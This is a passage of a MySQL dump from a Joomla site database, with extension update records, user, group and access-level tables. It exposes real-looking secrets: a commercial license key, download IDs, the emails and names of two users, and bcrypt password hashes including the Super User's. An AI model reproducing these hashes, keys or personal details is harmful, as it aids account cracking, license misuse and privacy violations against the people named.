Indonesia','','pkg_id-ID','package','',0,'3.6.2.1','','https://update.joomla.org/language/details3/id-ID_details.xml','',''),(2887,3,0,'Irish','','pkg_ga-IE','package','',0,'3.8.13.1','','https://update.joomla.org/language/details3/ga-IE_details.xml','',''),(2888,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2889,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2890,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2891,3,0,'Khmer','','pkg_km-KH','package','',0,'3.4.5.1','','https://update.joomla.org/language/details3/km-KH_details.xml','',''),(2892,3,0,'Korean','','pkg_ko-KR','package','',0,'3.8.9.1','','https://update.joomla.org/language/details3/ko-KR_details.xml','',''),(2893,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(2894,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2895,3,0,'Macedonian','','pkg_mk-MK','package','',0,'3.6.5.1','','https://update.joomla.org/language/details3/mk-MK_details.xml','',''),(2896,3,0,'Malay','','pkg_ms-MY','package','',0,'3.4.1.2','','https://update.joomla.org/language/details3/ms-MY_details.xml','',''),(2897,3,0,'Montenegrin','','pkg_srp-ME','package','',0,'3.3.1.2','','https://update.joomla.org/language/details3/srp-ME_details.xml','',''),(2898,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(2899,3,0,'Norwegian Nynorsk','','pkg_nn-NO','package','',0,'3.4.2.1','','https://update.joomla.org/language/details3/nn-NO_details.xml','',''),(2900,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.10.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2901,3,0,'Polish','','pkg_pl-PL','package','',0,'3.10.6.3','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2902,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2903,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2904,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2905,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2906,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2907,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2908,3,0,'Sinhala','','pkg_si-LK','package','',0,'3.3.1.2','','https://update.joomla.org/language/details3/si-LK_details.xml','',''),(2909,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2910,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2911,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2912,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2913,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2914,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2915,3,0,'Syriac, East','','pkg_sy-IQ','package','',0,'3.4.5.1','','https://update.joomla.org/language/details3/sy-IQ_details.xml','',''),(2916,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2917,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2918,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(2919,3,0,'Turkmen','','pkg_tk-TM','package','',0,'3.5.0.2','','https://update.joomla.org/language/details3/tk-TM_details.xml','',''),(2920,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(2921,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(2922,3,0,'Vietnamese','','pkg_vi-VN','package','',0,'3.2.1.2','','https://update.joomla.org/language/details3/vi-VN_details.xml','',''),(2923,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2924,10,10001,'Helix3 - Ajax','','helix3','plugin','ajax',0,'3.0.2','','http://www.joomshaper.com/updates/plg-ajax-helix3.xml','',''),(2925,11,10002,'System - Helix3 Framework','','helix3','plugin','system',0,'3.0.2','','http://www.joomshaper.com/updates/plg-system-helix3.xml','',''),(2926,13,10003,'shaper_helix3','Shaper Helix3','shaper_helix3','template','',0,'3.0.2','','http://www.joomshaper.com/updates/shaper-helix3.xml','',''),(2927,17,10004,'SP Page Builder Pro','','com_sppagebuilder','component','',1,'3.8.7','','http://www.joomshaper.com/updates/com-sp-page-builder-pro.xml','','joomshaper_email=bevan%40crashtackle.co.za&joomshaper_license_key=58b5b1e44ceef4c6244f86bb8d812b53'),(2929,26,10031,'ImageRecycle','ImageRecycle images and pdf optimizer','com_imagerecycle','component','',1,'2.1.0','','https://www.imagerecycle.com/joomla_extension.xml','https://www.imagerecycle.com/',''),(2930,30,0,'DJ-ImageSlider Package','','pkg_dj-imageslider','package','',0,'4.3','','http://dj-extensions.com/updates/djimageslider.xml','https://dj-extensions.com/component/ars/items/dj-imageslider4.3?category_id=11',''),(2931,51,10018,'Akeeba Backup Professional package','','pkg_akeeba','package','',0,'8.1.8','','https://cdn.akeebabackup.com/updates/pkgakeebapro.xml','https://www.akeeba.com/download/akeeba-backup/8-1-8.html','dlid=e71ed15695d9335d00057d6681477e90'),(2932,53,10033,'Admin Tools Professional package','','pkg_admintools','package','',0,'6.1.6','','https://cdn.akeebabackup.com/updates/pkgadmintoolspro.xml','https://www.akeeba.com/download/admintools/6-1-6.html','dlid=e71ed15695d9335d00057d6681477e90'),(2933,55,10080,'Akeeba Frontend Framework (FEF)','','file_fef','file','',0,'2.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/2-1-0.html',''),(2934,62,10095,'JSitemap Professional','Our commercial extensions in order to be updated through the Joomla! updater require that you specify your email address used for the account registration on our website https://storejextensions.org in the extension configuration to validate your license. To download this new release you need a valid updates license that is included for 1 year from the date of the purchase. If your license is expired you can simply buy again this product to download this latest release and extend free updates for 1 additional year. Visit our store at https://storejextensions.org and after login check your \'Purchased products\' reserved area.','com_jmap','component','',1,'4.9.2','','http://storejextensions.org/updates/jsitemap_updater.xml','http://storejextensions.org/extensions/jsitemap_professional.html',''),(2935,68,10107,'CookieHint','','cookiehint','plugin','system',0,'1.4.0','','https://www.redim.de/jupdates/cookiehint.xml','https://www.redim.de/downloads/erweiterungen/cookiehint',''),(3305,1,700,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','','');
/*!40000 ALTER TABLE `vzx9b_updates` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_user_keys`
--
DROP TABLE IF EXISTS `vzx9b_user_keys`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_user_keys` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`user_id` varchar(150) NOT NULL,
`token` varchar(255) NOT NULL,
`series` varchar(191) NOT NULL,
`invalid` tinyint(4) NOT NULL,
`time` varchar(200) NOT NULL,
`uastring` varchar(255) NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `series` (`series`),
KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_user_keys`
--
LOCK TABLES `vzx9b_user_keys` WRITE;
/*!40000 ALTER TABLE `vzx9b_user_keys` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_user_keys` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_user_notes`
--
DROP TABLE IF EXISTS `vzx9b_user_notes`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_user_notes` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`user_id` int(10) unsigned NOT NULL DEFAULT 0,
`catid` int(10) unsigned NOT NULL DEFAULT 0,
`subject` varchar(100) NOT NULL DEFAULT '',
`body` text NOT NULL,
`state` tinyint(3) NOT NULL DEFAULT 0,
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_user_id` int(10) unsigned NOT NULL,
`modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`review_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`id`),
KEY `idx_user_id` (`user_id`),
KEY `idx_category_id` (`catid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_user_notes`
--
LOCK TABLES `vzx9b_user_notes` WRITE;
/*!40000 ALTER TABLE `vzx9b_user_notes` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_user_notes` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_user_profiles`
--
DROP TABLE IF EXISTS `vzx9b_user_profiles`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_user_profiles` (
`user_id` int(11) NOT NULL,
`profile_key` varchar(100) NOT NULL,
`profile_value` text NOT NULL,
`ordering` int(11) NOT NULL DEFAULT 0,
UNIQUE KEY `idx_user_id_profile_key` (`user_id`,`profile_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Simple user profile storage table';
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_user_profiles`
--
LOCK TABLES `vzx9b_user_profiles` WRITE;
/*!40000 ALTER TABLE `vzx9b_user_profiles` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_user_profiles` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_user_usergroup_map`
--
DROP TABLE IF EXISTS `vzx9b_user_usergroup_map`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_user_usergroup_map` (
`user_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Foreign Key to #__users.id',
`group_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Foreign Key to #__usergroups.id',
PRIMARY KEY (`user_id`,`group_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_user_usergroup_map`
--
LOCK TABLES `vzx9b_user_usergroup_map` WRITE;
/*!40000 ALTER TABLE `vzx9b_user_usergroup_map` DISABLE KEYS */;
INSERT INTO `vzx9b_user_usergroup_map` VALUES (309,8),(310,2),(310,8);
/*!40000 ALTER TABLE `vzx9b_user_usergroup_map` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_usergroups`
--
DROP TABLE IF EXISTS `vzx9b_usergroups`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_usergroups` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
`parent_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Adjacency List Reference Id',
`lft` int(11) NOT NULL DEFAULT 0 COMMENT 'Nested set lft.',
`rgt` int(11) NOT NULL DEFAULT 0 COMMENT 'Nested set rgt.',
`title` varchar(100) NOT NULL DEFAULT '',
PRIMARY KEY (`id`),
UNIQUE KEY `idx_usergroup_parent_title_lookup` (`parent_id`,`title`),
KEY `idx_usergroup_title_lookup` (`title`),
KEY `idx_usergroup_adjacency_lookup` (`parent_id`),
KEY `idx_usergroup_nested_set_lookup` (`lft`,`rgt`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_usergroups`
--
LOCK TABLES `vzx9b_usergroups` WRITE;
/*!40000 ALTER TABLE `vzx9b_usergroups` DISABLE KEYS */;
INSERT INTO `vzx9b_usergroups` VALUES (1,0,1,18,'Public'),(2,1,8,15,'Registered'),(3,2,9,14,'Author'),(4,3,10,13,'Editor'),(5,4,11,12,'Publisher'),(6,1,4,7,'Manager'),(7,6,5,6,'Administrator'),(8,1,16,17,'Super Users'),(9,1,2,3,'Guest');
/*!40000 ALTER TABLE `vzx9b_usergroups` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_users`
--
DROP TABLE IF EXISTS `vzx9b_users`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_users` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(400) NOT NULL DEFAULT '',
`username` varchar(150) NOT NULL DEFAULT '',
`email` varchar(100) NOT NULL DEFAULT '',
`password` varchar(100) NOT NULL DEFAULT '',
`block` tinyint(4) NOT NULL DEFAULT 0,
`sendEmail` tinyint(4) DEFAULT 0,
`registerDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`lastvisitDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`activation` varchar(100) NOT NULL DEFAULT '',
`params` text NOT NULL,
`lastResetTime` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Date of last password reset',
`resetCount` int(11) NOT NULL DEFAULT 0 COMMENT 'Count of password resets since lastResetTime',
`otpKey` varchar(1000) NOT NULL DEFAULT '' COMMENT 'Two factor authentication encrypted keys',
`otep` varchar(1000) NOT NULL DEFAULT '' COMMENT 'One time emergency passwords',
`requireReset` tinyint(4) NOT NULL DEFAULT 0 COMMENT 'Require user to reset password on next login',
PRIMARY KEY (`id`),
UNIQUE KEY `idx_username` (`username`),
KEY `idx_name` (`name`(100)),
KEY `idx_block` (`block`),
KEY `email` (`email`)
) ENGINE=InnoDB AUTO_INCREMENT=311 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_users`
--
LOCK TABLES `vzx9b_users` WRITE;
/*!40000 ALTER TABLE `vzx9b_users` DISABLE KEYS */;
INSERT INTO `vzx9b_users` VALUES (309,'Super User','crashtackle','bevan@webspring.co.za','$2y$10$WQwRq/wfzwRUAkWZcBkiduD9G47KA/k4hpCGkdxQS6yb0Fqa.V4Im',0,1,'2016-08-21 13:07:35','2022-06-28 12:54:00','0','','0000-00-00 00:00:00',0,'','',0),(310,'Shirley Smith','Shirley Smith','shirley@smithandsmith.co.za','$2y$10$ZKZQBSAMhMqp.NXKD.trdO4gxDX6EYV07Uyezlk.ReR8xW6zVDvXO',0,0,'2020-02-18 08:33:24','2020-04-23 14:36:19','','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0);
/*!40000 ALTER TABLE `vzx9b_users` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_utf8_conversion`
--
DROP TABLE IF EXISTS `vzx9b_utf8_conversion`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_utf8_conversion` (
`converted` tinyint(4) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_utf8_conversion`
--
LOCK TABLES `vzx9b_utf8_conversion` WRITE;
/*!40000 ALTER TABLE `vzx9b_utf8_conversion` DISABLE KEYS */;
INSERT INTO `vzx9b_utf8_conversion` VALUES (5);
/*!40000 ALTER TABLE `vzx9b_utf8_conversion` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_viewlevels`
--
DROP TABLE IF EXISTS `vzx9b_viewlevels`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_viewlevels` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
`title` varchar(100) NOT NULL DEFAULT '',
`ordering` int(11) NOT NULL DEFAULT 0,
`rules` varchar(5120) NOT NULL COMMENT 'JSON encoded access control.',
PRIMARY KEY (`id`),
UNIQUE KEY `idx_assetgroup_title_lookup` (`title`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_viewlevels`
--
LOCK TABLES `vzx9b_viewlevels` WRITE;
/*!40000 ALTER TABLE `vzx9b_viewlevels` DISABLE KEYS */;
INSERT INTO `vzx9b_viewlevels` VALUES (1,'Public',0,'[1]'),(2,'Registered',2,'[6,2,8]'),(3,'Special',3,'[6,3,8]'),(5,'Guest',1,'[9]'),(6,'Super Users',4,'[8]');
/*!40000 ALTER TABLE `vzx9b_viewlevels` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2023-01-05 22:10:37